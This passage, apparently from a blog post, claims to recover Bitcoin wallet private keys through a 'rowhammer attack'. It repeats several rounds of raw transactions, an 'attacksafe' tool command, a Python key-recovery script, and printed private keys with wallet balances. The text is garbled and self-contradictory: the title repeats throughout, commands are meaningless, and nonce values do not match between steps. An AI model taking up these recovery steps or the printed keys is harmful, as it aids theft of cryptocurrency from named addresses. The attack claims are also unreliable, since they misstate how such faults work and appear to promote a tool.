PrivKey = 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba

Let’s open bitaddress and check:

ADDR: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
HEX:  86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 708.99


With detailed cryptanalysis, we also found a critical vulnerability in Bitcoin Address:


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe

RawTX = 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab , 0x4dd4a6ea5041635a29cafaeb019dce1848cab62c5b638dd235c3177f361f0911)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17

R          =    0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
point2gen  =   (0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab , 0x4dd4a6ea5041635a29cafaeb019dce1848cab62c5b638dd235c3177f361f0911)


K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b

Let’s open bitaddress and check:

ADDR: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
HEX:  cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 698.45

The potential threat of losing BTC coins lies in the critical vulnerability of the Bitcoin blockchain transaction, so we strongly recommend that everyone always update the software and use only verified devices.

With detailed cryptanalysis, we also found a critical vulnerability in 7de3c41e439bbab837602019e17611d6fe9d245bcb1f182add148fc35fc42e8f for the same Bitcoin Address TXID:

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c

RawTX = 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819 , 0x21ef3da06220ca412f63e331d3ad52effee2b6afe4bcbba76380f30abbf91f5b)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8

R          =    0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
point2gen  =   (0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819 , 0x21ef3da06220ca412f63e331d3ad52effee2b6afe4bcbba76380f30abbf91f5b)


K = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b

Let’s open bitaddress and check:

ADDR: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
HEX:  cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 698.45


With detailed cryptanalysis, we also found a critical vulnerability in Bitcoin Address:


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820

RawTX = 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7 , 0xce504e53221559f480af279f313f5f4913f6b8c317561e570290e3b1b6da0a94)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e

R          =    0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
point2gen  =   (0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7 , 0xce504e53221559f480af279f313f5f4913f6b8c317561e570290e3b1b6da0a94)


K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf

Let’s open bitaddress and check:

ADDR: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
HEX:  e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 679.53

The potential threat of losing BTC coins lies in the critical vulnerability of the Bitcoin blockchain transaction, so we strongly recommend that everyone always update the software and use only verified devices.

With detailed cryptanalysis, we also found a critical vulnerability in 17ea9403f628a1810ffa70858dd5411c455fbdc1fd8c7e2048c5e5ae5d2ac839 for the same Bitcoin Address TXID:

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a

RawTX = 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368 , 0x37b895600595d773ef80780fadfb81f34ab997aafdee272e1baf1b199df853a3)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8

R          =    0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
point2gen  =   (0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368 , 0x37b895600595d773ef80780fadfb81f34ab997aafdee272e1baf1b199df853a3)


K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf

Let’s open bitaddress and check:

ADDR: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
HEX:  e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 679.53


With detailed cryptanalysis, we also found a critical vulnerability in Bitcoin Address:


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be

RawTX = 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935 , 0xb05023fec1068addab6d25f08d358e6f25edd83094ac730dcb7124ef3f662af7)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
